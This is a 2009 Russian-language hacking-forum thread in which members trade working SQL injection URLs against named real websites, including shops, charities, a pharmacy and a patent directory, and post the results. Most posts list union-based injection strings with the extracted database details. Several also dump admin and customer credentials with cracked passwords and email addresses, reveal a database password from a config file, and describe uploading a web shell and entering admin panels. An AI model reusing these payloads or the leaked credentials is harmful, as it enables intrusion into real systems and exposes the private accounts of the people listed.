Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
19.01.2009, 23:31
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
Для Военный , молодой человек..никогда не сдавайся
1.http://www.usadba.ru/city/flat/5481/?-1+order+by+5--
version()- 5.0.67
user() - real_user@zvm15.host.ru
database()-base_usadba
слепая скуля...поможет нам СИПТ небезизвестный... посимвольный брут и вуаля
с 1-16 стандартные таблички... а дальшe
Getted String number 17:a_flats
Getted String number 18:a_flats_arenda
Getted String number 19:a_houses
Getted String number 20:b_dormitory_arenda
Getted String number 21:drm_s_highway
Getted String number 22:l_house_area
Getted String number 23:l_house_informal
Getted String number 24:mmedia_city
Getted String number 25:mmedia_drm
Getted String number 26:mmedia_house
ну я думаю понятно...ковыряй дальше сам.... удачи
|
|
|
20.01.2009, 07:53
|
|
Познающий
Регистрация: 15.09.2008
Сообщений: 54
Провел на форуме:
612815
Репутация:
46
|
|
Код:
http://heyyou.ru/?page=proooblogs&id=-1+union+select+1,2,3,version(),5,6,7,8,9--
|
|
|
|
20.01.2009, 16:23
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Код:
http://www.ypr.org.au/view_history.php?historyID=-6'+union+select+1,concat_ws(0x3a,USER(),DATABASE(),VERSION())/*
User: ypr@localhost
Database: ypr_org_au
Version: 4.1.20
http://www.nihonjujutsu.com/history.php?HistoryID=-7+union+select+1,2,concat_ws(0x3a,USER(),DATABASE(),VERSION()),4,5,6/*
User: jujutsu@localhost
Database: jujutsu
Version: 5.0.32-Debian_7etch8-log
http://www.onegi.com.tw/AboutOneGi/History_Content.php?HistoryID=-2+union+select+1,2,concat_ws(0x3a,USER(),DATABASE(),VERSION()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22%20--
User: onegi@localhost
Database: onegi
Version: 5.1.30-community
http://www.xinanchem.com/historyxiangxi.php?historyId=-143+union+select+1,2,concat_ws(0x3a,USER(),DATABASE(),VERSION()),4,5/*
User: root@localhost
Database: wynca2
Version: 4.0.13-nt
http://www.wynca.com/en/historyxiangxi.php?historyId=-110+union+select+1,concat_ws(0x3a,USER(),DATABASE(),VERSION()),3,4,5/*
User: root@localhost
Database: wynca2
Version: 4.0.13-nt
http://www.welltec.com.hk/news_see.php?thisid=-18+union+select+1,2,concat_ws(0x3a,USER(),DATABASE(),VERSION()),4,5,6/*
User: root@localhost
Database: welltec_com_hk
Version: 5.0.26-community-nt
http://www.salmonsupporters.com/detailsupporters.php?thisid=-32+union+select+1,concat_ws(0x3a,USER(),DATABASE(),VERSION()),3,4,5,6,7,8,9,10,11,12/*
User: wssDBadmin@208.109.181.3
Database: wssDBadmin
Version: 4.1.22-max-log
http://www.lyrics.nl/showsong.php?songid=28151&artiestid=552&historyid=-12632+UNION+SELECT+1,concat_ws(0x3a,USER(),DATABASE(),VERSION()),3/*
User: filmenmu@localhost
Database: filmenmu
Version: 4.1.22
http://www.cosmos-ml.com/en/news_see.php?thisid=-1+UNION+SELECT+1,2,concat_ws(0x3a,USER(),DATABASE(),VERSION()),4,5,6/*
User: root@localhost
Database: dg_cosmos
Version: 5.0.26-community-nt
http://www.orcaschurch.org/Church_Notes.php?thisID=-28+union+select+1,2,concat_ws(0x3a,USER(),DATABASE(),VERSION()),4,5%20--
User: orcaschurch@localhost
Database: orcaschurch
Version: 5.0.58
http://www.gvchristian.com/videopopup.php?thisid=307+UNION+SELECT+1,concat_ws(0x3a,USER(),DATABASE(),VERSION()),3,4,5,6,7,8,9,10/*
User: root@localhost
[b]Database:/b] fatguys_gvcc
Version: 5.0.45-Debian_1ubuntu3-log
Это за вчера =). Мои скули. Крутите... |
|
|
|
20.01.2009, 18:55
|
|
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
Провел на форуме:
800953
Репутация:
443
|
|
http://www.directoryofpediatricians.com/details.php?id=37890797987631+union+select+1,2,3,4 ,5,6,7,8,9,concat_ws(0x3a,user(),version(),databas e())--
dofp_ab@localhost
4.1.22-standard
dofp_db
http://www.ecrush.com/loveadvice/index.php?cat=9&id=30709709878768531+union+select+ 1,2,3,4,5,6,concat_ws(0x3a,user(),version(),databa se()),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,2 3,24,25--
Database Version: 5.0.46-enterprise-gpl-log
Database name: espin_dbo
User name: ecrush@172.20.65.64
http://www.poetryfoundation.org/journal/feature.html?id=18239776986986554+union+select+1,2 ,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,concat_w s(0x3a,user(),version(),database()),20--
PageRank 7
Database Version: 5.0.32-Debian_7etch5-log
Database name: poetry
User name: test@10.0.0.1
http://carbonrecords.com/calendar/showevent.php?id=37798798798731+union+select+1,2,3 ,4,5,6,concat_ws(0x3a,user(),version(),database()) ,8--
User:carbonruby@nariko.dreamhost.com
Version:5.0.67-log
Database:carbonrecords
Ну и законченный магазинчик на вкусное -)
http://www.europanet.com.br/site/index.php?cat_id=32&pag_id=-13673+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30, 31,32,33,34,35,36,37,38,39,40,41,42,43,version(),4 5,46,47,48,49,50,51,52,53,54,55--
Database Version: 5.0.18-log
Database name: europanet
User name: arima@localhost
В общем там 38 Баз для всех пойдет и спам и аси кард итд...
Getting Data from table loja_admin (11 Rows) from database eurobest_commerce
Fields id_admin:usuario:senha:superadmin
[4]:9:carmina:5268582b6eaed9fee8a2658b4f57707a:0
[5]:10:luiz:ebea0b104bf6f36f1eb2ddc931d666ea:1
[6]:11:internet:b7b791e873f143d5318310e59022175d:1
[7]:12:claudia:5268582b6eaed9fee8a2658b4f57707a:0
[8]:13:joana:0ffbdca648adb61d5535ff063e70cb3f:1 пароль amidala
[9]:14:licia:63c193707ac085b2f8dd3115f546d6ed:0
Fields usuario:senha:admin_cat:admin_ftp
[1]:crnarciso:317a77f27ecd0390:0:
[2]:siqueira:0f1209ee38606424:0:
[3]:joice:0e9df198295e5bc8:0: Пароль joice
[4]:erick:350ef7027f408372:0:
[5]:ivan:323ef54f34efa5cb:4: Пароль 120585
[6]:diogo:081c619177dbefa1:0:
[7]:expedicao:6acea1340bfcbf5e:13:
[8]:manu:5210fdc242391e30:575:
[9]:livia:0ce5dd0f706534ab:600: Пароль fotografe
[10]:humberto:6460f98b14d0ae2e:572:/animeinvaders/
[11]:rodolfo:4151a9df6c9924ac:617:/motomax/
[12]:mariofit:136940302c5235c7:617: Пароль ducati
[13]:chris:2d2643c419314e1b:430:/sucesso/
[14]:gameblog:36dda20c5784bd81:825:
[15]:luiz:36dda20c5784bd81:832:/gameblog/
[16]:nelson:36dda20c5784bd81:834:/gameblog/
[17]:leandro:36dda20c5784bd81:831:/gameblog/
[18]:julebas:36dda20c5784bd81:830:/gameblog/
[19]:fhazevedo:36dda20c5784bd81:828:/gameblog/
[20]:sombrates:36dda20c5784bd81:835:/gameblog/
[21]:trivella:36dda20c5784bd81:836:/gameblog/
[22]:humberto_gb:36dda20c5784bd81:829:/gameblog/
[23]:aida:449a67e9524397b5:2:/natureza/ Пароль plantas
[24]:junior:63a09b66402d69ac:977:/xbox/
[25]:marco:36ad6fa45d632cd4:1:/ Пароль хэш MySQL:36ad6fa45d632cd4  ortugal FTP 200.229.132.34:21
[26]:adriano:44d383005b181d39:35: Пароль marley
[27]:luciane:26ae382f4d7de2e9:375:/sucesso/ Пароль lembrar
[28]:humbertoblog:36dda20c5784bd81:829:
[29]:flavia:36dda20c5784bd81:971:/gameblog/
[30]:gustavo:36dda20c5784bd81:970:/gameblog/
В общем самое важное было это залить шел..
Прошел в админку через тело
marco:36ad6fa45d632cd4:1:/ Пароль хэш MySQL:36ad6fa45d632cd4 ortugal FTP 200.229.132.34:21
Ну и спокойно залил.
Далее раскопал конфиг там важная персона
// Database username
$phpAds_config['dbuser'] = 'arima';
// Database password
$phpAds_config['dbpassword'] = 'spectroman21';
Доступ ко всем базам!
save mode отключен -)
Наслаждайтесь.
PostgreSQL 7.2.7 on i686-pc-linux-gnu, compiled by GCC 2.96
http://www.elliottagency.co.uk/details.php?id=-258/**/union/**/select/**/null,null,null,null,null,null,null,null,null,null, null,null,null,null,null,null,null,null,null,null, null,null,null,null,null,null,version()--&r=/list.php
http://www.elliottagency.co.uk/details.php?id=-258/**/union/**/select/**/null,null,null,null,null,null,null,null,null,null, null,null,null,null,null,null,null,null,null,null, null,null,null,null,null,null,TABLENAME/**/from/**/PG_TABLES+LIMIT+1,1--&r=/list.php
itemimages
CATEGORIES
items
pg_aggregate
pg_am
pg_amop
pg_amproc
pg_attrdef
pg_attribute
pg_xactlock
pg_type
pg_trigger
pg_statistic
pg_shadow
pg_rewrite
pg_relcheck
pg_proc
pg_operator
pg_opclass
pg_listener
pg_largeobject
pg_language
pg_inherits
pg_index
pg_group
pg_description
pg_database
pg_class
Дальше не могу может кто сможет....
DATAMP - Directory of American Tool and Machinery Patents
http://www.datamp.org/displayPatent.php?id=809809809809837107+union+sele ct+1,2,3,4,5,concat_ws(0x3a,user(),version(),datab ase()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,2 2,23,24--&pn=15
Database Version: 5.0.67-community-nt
Database name: datamp
User name: datamp_owner@localhost
http://www.datamp.org/displayPatent.php?id=809809809809837107+UNION+SELE CT+1,2,3,4,5,CONCAT((SELECT+CONCAT(steward_id,user name,password,name,email)+FROM+datamp.data_steward s+LIMIT+19,1)),7,8,9,10,11,12,13,14,15,16,17,18,19 ,20,21,22,23,24--
[1]:2:rbrendler:513eb98aea47a672a8f3536970b958fe:Ralp h Brendler:rebrendler@gmail.com
[2]:3:jjoslin:0869cf46fd51daaf1ee9ad0a2d2dba6a:Jeff Joslin:datamp@joslin.ca
[3]:4:blpenn:a16aa06b2f0474f3a361be2bfadb9070:Brian Pennington:blpenn@attilathehun.com
[4]:5:sreynolds:d41d8cd98f00b204e9800998ecf8427e:Stev e Reynolds:s.e.reynolds@verizon.net
[5]:6:groberts:7db90444501f73dbb69c90ce7abdc329:Gary Roberts:groberts76@attbi.com
[6]:7:khays:eb416ed484bb765f198c8f43d95ccee8:Kirk Hays:khays@comcast.net
[7]:8:cswingle:d41d8cd98f00b204e9800998ecf8427e:Chris Swingley:cswingle@iarc.uaf.edu
[8]:9:jmcvey:0869cf46fd51daaf1ee9ad0a2d2dba6a:Jeff McVey:jmcvey123@msn.com
[9]:11:datchuck:61bc4419f39a648db27277c551367a5a:Jim Erdman:jlerdman@yahoo.com
[10]:13:cmatthews:1697d46fbd40f5fb68babd2776fd9d0a:Car l Matthews:vise27@gmail.com
[11]:14:dmcconnell:c4ce0603e30080fa5f54e59a94d7921f  o n McConnell:donmccnnll@yahoo.com
[12]:15:rallen:5c40e218bd15cc65899c3ab8905c4656:Russ Allen:rrjallen@yahoo.com
[13]:16:sschulz:d44c2e495958b2062ae1049b20b4aa35:Stan Schulz:mvwcnews@neb.rr.com
[14]:17:motllahsram:5abf97a52e1d08577d1294d9a46d0988:T om Marshall:motllahsram@comcast.net
[15]:18:joelr:ca3df0a222b067dbce8712a979bc9145:Joel Havens:joelr4@verizon.net
[16]:19:murness:c6dafa4f1768d773a4a877f663b59629:Mike Urness:HD1933VLE@aol.com
[17]:20:tpobrienjr:dc787b140dc4fc95ec5fd3ee4e361c6d:To m O'Brien:tpobrienjr@earthlink.net
[18]:21:mwoodard:e15c0f3c29d61392357cbf71c9486e26:Mark Woodard:mark.woodard@nasa.gov
[19]:23:mconley:7ac80e96ae9183e4f5811924f0606203:Mark Conley:sawst2004@yahoo.com
Понравился вот этот ящик -) woodard@nasa.gov
Последний раз редактировалось spherics; 21.01.2009 в 18:29..
|
|
|
|
21.01.2009, 19:51
|
|
Познающий
Регистрация: 21.01.2009
Сообщений: 98
Провел на форуме:
227123
Репутация:
122
|
|
интернет магазин аксессуаров и подарков
табла с паролями и мылами
Код:
http://eluxus.com.ua/catalog/index.php?_a=view&_cat=-73 UNION SELECT 1,2,concat_ws(char(58),email,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 FROM useraccounts --
админка
http://eluxus.com.ua/admin/
кто админ незнаю, ройте =)
магазин топмобила
Код:
http://www.topmobila.com.ua/allg.php?id=-13 UNION SELECT 1,2,3,concat_ws(0x3a,USER(),DATABASE(),VERSION()),5,6,7,8,9,10,11,12,13,14 --
version::5.0.67-community
user::shmel_admin@localhost
database::shmel_mobiles
Вывод всех таблиц
Код:
http://www.topmobila.com.ua/allg.php?id=-13 UNION SELECT 1,2,3,TABLE_NAME,5,6,7,8,9,10,11,12,13,14 FROM INFORMATION_SCHEMA.TABLES --
какой то Белорусский чат
Код:
http://www.irc.by/modules/articles/article.php?id=-16 UNION SELECT 1,2,3,4,5,6,concat_ws(0x3a,USER(),DATABASE(),VERSION()),8,9,10,11,12,13,14,15,16,17,18,19,20 --
version::4.1.25
User::ircby_xoops@localhost
database::ircby_xoops
интернет бутик для женщин
Код:
http://all-perfumes.com.ua/index.php?act=cat&id=-66 UNION SELECT concat_ws(0x3a,USER(),DATABASE(),VERSION()),2,3,4,5 --
version::4.1.12-standard-log
user::drnova_dnj0Pw3@localhost
database::drnova_apP4n1c7
Последний раз редактировалось TELO; 21.01.2009 в 20:07..
|
|
|
|
21.01.2009, 20:34
|
|
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
Провел на форуме:
800953
Репутация:
443
|
|
Магазинчик -)
http://www.dare2livedog.com/detail.php?id=3687389798798761+union+select+1,2,3, 4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 ,23,24,25,26,27,28,29,30,concat_ws(0x3a,user(),ver sion(),database()),32--
Database Version: 5.0.67-community-log
Database name: zoomacti_products
User name: zoomacti_dare2li@localhost
Database [zoomacti_products]
Table [admin_settings (2 Rows)]
setting
value
Table [category (7 Rows)]
id
category
seo_title
seo_footer
Table [orders (254 Rows)]
order_id
orderdate
items
subtotal
shipping
tax
total
shipping_method
approved
transaction_id
first_name
last_name
phone
address
city
state
zip
country
shipping_first_name
shipping_last_name
shipping_address
shipping_city
shipping_state
shipping_zip
shipping_country
comments
giftwrap
gift_card_note
Table [products (1060 Rows)]
id
serial_number
name
descrip
slogan
color
size
category_id
subcategory_id
image
alt_tag
large_image
large_alt_tag
seo_title
seo_footer
active
Table [subcategory (33 Rows)]
id
category_id
subcategory
description
price
columns
sizes
header_image
header_alt_tag
image
small_alt_tag
seo_title
seo_footer
Table [users (127 Rows)]
userid
email
password
first_name
last_name
phone
address
city
state
zip
country
shipping_first_name
shipping_last_name
shipping_address
shipping_city
shipping_state
shipping_zip
shipping_country
http://www.dare2livedog.com/detail.php?id=3687389798798761+UNION+SELECT+1,2,3, 4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 ,23,24,25,26,27,28,29,30,CONCAT((SELECT+CONCAT(ema il,password)+FROM+zoomacti_products.users+LIMIT+6, 1)),32--
Fields email assword
[1] avid_masland@yahoo.com :ghijkl
[2]:clay@claybutler.com :lackluster
[3]:Billy@Hoo.com :ghijkl
[4]:mydol@earthlink.net :mydol
[5]:mizen@firstact.com :markizen
[6]:dtomsera@hpsarch.com :d2ljunik
[7]:gmarkel@dahlingroup.com :buster1
[8]:sedel@apidesign.com :edel9889
[9] eter.sasmore@gmail.com :turbo
[10]:k8kruley@juno.com :bruin85
[11]:sschineller@comcast.net :ila105bs
[12]:joryaquino@yahoo.com :marketing
[13]:gretchenwalter@hotmail.com :dissert
[14]:milagros87@comcast.net :bosscake
[15]:helen_chill@yahoo.com :qqqqqqqqqq
[16]:dliltracks@yahoo.com :ddddd
[17]:aa@aa.com :aa
[18]:asdf@adsa.com :987
[19]:david_masland@yahoo.com :ggggg
Итд...
И еще один магазинчик
http://www.jewelleryforall.com/view2.php?id=277987987668768768+union+select+1,2,3 ,concat_ws(0x3a,user(),version(),database()),5,6,7 ,8,9,10,11,12,13,14,15,16,17,18,19,20,21--
Database Version: 5.0.45
Database name: jfa
User name: jfa@localhost
Database [jfa]
Table [PPorders (7 Rows)]
id
time
PPdata
total
items_array
sizes_array
prices_array
status
voucher
vouchercode
Table [addresses (7344 Rows)]
id
user_id
AddressType
Fname
Sname
tel
mobile
email
Line1
Line2
Line3
Line4
Town
State
PostCode
Country
updatedate
Table [banner (1 Rows)]
image1
image2
image3
image4
image5
image6
text
Table [banner2 (1 Rows)]
image1
image2
image3
Table [brands (34 Rows)]
id
brand
Table [chain_sizes (473 Rows)]
id
ref
16_avail
16_price
16_rrp
16_weight
18_avail
18_price
18_rrp
18_weight
20_avail
20_price
20_rrp
20_weight
22_avail
22_price
22_rrp
22_weight
24_avail
24_price
24_rrp
24_weight
26_avail
26_price
26_rrp
26_weight
28_avail
28_price
28_rrp
28_weight
Table [countries (239 Rows)]
country
code
region
Table [dump (7036 Rows)]
id
orderID
data
Table [instant_sale (1 Rows)]
id
sale
Table [links (3 Rows)]
id
title
url
description
Table [membership (1 Rows)]
number
Table [orders (2977 Rows)]
oid
time
name
addr1
addr2
addr3
town
county
state
country
postcode
tel
email
items_array
sizes_array
prices_array
total
clientid
ordertime
vbv
status
voucher
vouchercode
del_address
tracking
Table [pages (56 Rows)]
page
content
Table [products (7612 Rows)]
id
type
ref
title
description
rrp
price
image
image2
metal
stone
Table [reminders (21 Rows)]
id
username
email
date
notes
Table [ring_banner (1 Rows)]
image1
image2
image3
Table [ring_sizes (583 Rows)]
ref
h
h2
i
i2
j
j2
k
k2
l
l2
m
m2
n
n2
o
o2
p
p2
q
q2
r
r2
s
s2
t
t2
u
u2
v
v2
w
w2
x
x2
y
y2
z
z2
Table [ring_sizes2 (789 Rows)]
ref
sizes
prices
Table [shop_orders (2334 Rows)]
id
date
address_id
del_address_id
total
net
vat
postage
recorded
vpsStatus
vpsDetail
vpsTxId
vpsSecurityKey
vpsTxAuthNo
status
voucher
vouchercode
tracking
method
Table [shop_orders_items (2682 Rows)]
id
order_id
product_id
voucher
quantity
size
price
giftwrap
Table [temp (29 Rows)]
id
dump
Table [test (7 Rows)]
id
BillingAddress
BillingPostCode
DeliveryAddress
DeliveryPostCode
VendorTxCode
Amount
TxType
Status
StatusDetail
VPSTxId
SecurityKey
TxAuthNo
AVSCV2
AddressResult
PostCodeResult
CV2Result
VBVSecureStatus
GiftAid
Table [users (1962 Rows)]
id
membership
Table [vouchers (1648 Rows)]
id
username
oid
value
Table [watch_banner (1 Rows)]
image1
image2
image3
Последний раз редактировалось spherics; 21.01.2009 в 20:58..
|
|
|
|
22.01.2009, 00:43
|
|
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497
Репутация:
303
|
|
http://www.ambisousa.pt/php/inserir_comentario.php?id=-1+union+select+1,2,3,4,login,passwd+from+users--
http://www.ambisousa.pt/admin/
login:ambisousa
pass:sousinha
Куяк!!!
|
|
|
|
22.01.2009, 00:50
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
Код:
http://sim-cat.com/cats.php?sex=-0+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/*&lang=eng
4.0.27-max-log
Код:
http://www.stylecat.ru/cats.php?sex=1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,version(),21,22,23,24,25,26,27,28,29--&breed=kbo&lang=rus
5.0.51a-log 2 |
|
|
|
22.01.2009, 04:40
|
|
Новичок
Регистрация: 19.01.2009
Сообщений: 12
Провел на форуме:
236651
Репутация:
92
|
|
The Winston Churchill Memorial Trust
Ниже представленный запрос такого вида, из-за отсутствия иного выхода по причине следующей ошибки:
Fatal error: Database error #1267: Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,SYSCONST) for operation 'UNION'
возникшая, к примеру, при функциях user(), database(),version(). А поля таблиц проходят без проблем.
http://www.churchilltrust.com.au/news.php?id=-2+union+select+1,concat_ws(0x20,length(user()),cha r(ASCII(substring(user(),1,1)),ASCII(substring(use r(),2,1)),ASCII(substring(user(),3,1)),ASCII(subst ring(user(),4,1)),ASCII(substring(user(),5,1)),ASC II(substring(user(),6,1)),ASCII(substring(user(),7 ,1)),ASCII(substring(user(),8,1)),ASCII(substring( user(),9,1)),ASCII(substring(user(),10,1)),ASCII(s ubstring(user(),11,1)),ASCII(substring(user(),12,1 )),ASCII(substring(user(),13,1)),ASCII(substring(u ser(),14,1)),ASCII(substring(user(),15,1)),ASCII(s ubstring(user(),16,1)),ASCII(substring(user(),17,1 ))),char(ASCII(substring(database(),1,1)),ASCII(su bstring(database(),2,1)),ASCII(substring(database( ),3,1)),ASCII(substring(database(),4,1)),ASCII(sub string(database(),5,1)),ASCII(substring(database() ,6,1)),ASCII(substring(database(),7,1)),ASCII(subs tring(database(),8,1)),ASCII(substring(database(), 9,1)),ASCII(substring(database(),10,1)),ASCII(subs tring(database(),11,1)),ASCII(substring(database() ,12,1)),ASCII(substring(database(),13,1)),ASCII(su bstring(database(),14,1)),ASCII(substring(database (),15,1)),ASCII(substring(database(),16,1)),ASCII( substring(database(),17,1)),ASCII(substring(databa se(),18,1)),ASCII(substring(database(),19,1)),ASCI I(substring(database(),20,1)),ASCII(substring(data base(),21,1))%20)),3,4,5,6/*
database():churchilltrust
user():winston@localhost
Код:
http://www.churchilltrust.com.au/news.php?id=-2+union+select+1,password,3,username,5,6+from+users/*
username:admin
password:4dm1n |
|
|
|
22.01.2009, 06:25
|
|
Познающий
Регистрация: 21.01.2009
Сообщений: 98
Провел на форуме:
227123
Репутация:
122
|
|
магазин подарков
Код:
http://www.chudesa.com.ua/?page=prod_detail&prod_id=-456%20UNION%20SELECT%201,2,3,concat_ws(0x3a,USER(),DATABASE(),VERSION()),5,6,7,8,9,10,11,12,13,14,15%20%20--
version::4.1.22
user::u_chudesa@localhost
database::chudesa
в табле users были следующие персоны:
login:test login:vika
passwors:123 password:pjhbr
Код:
http://www.chudesa.com.ua/?page=prod_detail&prod_id=-456%20UNION%20SELECT%201,2,login,pass,5,6,7,8,9,10,11,12,13,14,15%20from%20users%20limit%200,1%20--
ещё один магазин подарков
Код:
http://www.podarunky.kiev.ua/showpage.php?id=9999999%20UNION%20SELECT%201,2,3,c oncat_ws(0x3a,USER(),DATABASE(),VERSION()),5,6,7%2 0%20--
version::4.1.22-log
user::sitemaker@localhost
database::giftBase
Магазин медикаментов MEDIMAG
Код:
http://www.medimag.com.ua/index.php?view=products&razdel=4&sub=38&id=-278%20UNION%20SELECT%201,2,3,4,5,6,7,8,concat_ws(0x3a,USER(),DATABASE(),VERSION()),10,11,12,13,14,15,16,17,18,19,20%20--
version::4.1.22
user::u_medimag_ap@localhost
database::medimag_apteka
табла с паролями
Код:
http://www.medimag.com.ua/index.php?view=products&razdel=4&sub=38&id=-278%20UNION%20SELECT%201,2,3,4,5,6,7,login,password,10,11,12,13,14,15,16,17,18,19,20%20from%20users%20--
login::admin
password::shutnick
Вход в админку через сайт, можно реально оформить заказ и подтвердить его.
Книжный магазин
Код:
http://market.factor.ua/books.php?book_id=-811%20UNION%20SELECT%201,2,concat_ws(0x3a,USER(),DATABASE(),VERSION()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25%20--
version::4.1.20
user::market@localhost
database::market
Последний раз редактировалось jokester; 22.01.2009 в 12:11..
Причина: Объединил
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
